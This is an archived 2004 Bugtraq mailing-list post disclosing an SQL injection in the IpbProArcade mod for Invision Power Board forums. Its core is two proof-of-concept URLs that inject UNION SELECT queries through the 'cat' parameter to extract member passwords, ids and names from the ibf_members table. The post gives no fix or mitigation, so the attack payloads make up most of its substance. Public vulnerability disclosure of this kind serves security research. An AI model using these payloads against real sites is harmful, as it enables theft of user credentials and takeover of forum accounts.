IpbProArace 2.5.x SQL injection.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: IpbProArace 2.5.x SQL injection.
From: axl daivy <axlownz@xxxxxxxxx>
Date: 20 Nov 2004 20:05:53 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


i have found an sql injection in the popular ipbproarcade mod for ipb systems 
(1.x and 2.x)

the vuln exists in the "category" field.
buy using this field it is possible to inject any sql query and compemise the 
entire forum system

p.o.c

for ipb 1.x

http://site.com/index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

for ipb 2.x

index.php?act=Arcade&cat=-1%20UNION%20SELECT%200,0,legacy_password,id,name,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20ibf_members/*

discovered by Axl
credit goes to HLL for Helping me write the actual exploit
greetz to CereBrums And JonJon

cheers
Axl

Prev by Date: Re: SLMail 5.x POP3 Remote Pass Buffer Overflow Exploit
Next by Date: Re: SLMail 5.x POP3 Remote Pass Buffer Overflow Exploit
Previous by thread: TWiki exploit (search.pm / CAN-2004-1037)
Next by thread: [ECL] WCI TC-IDE embedded linux vulnerabilities
Index(es):
- Date
- Thread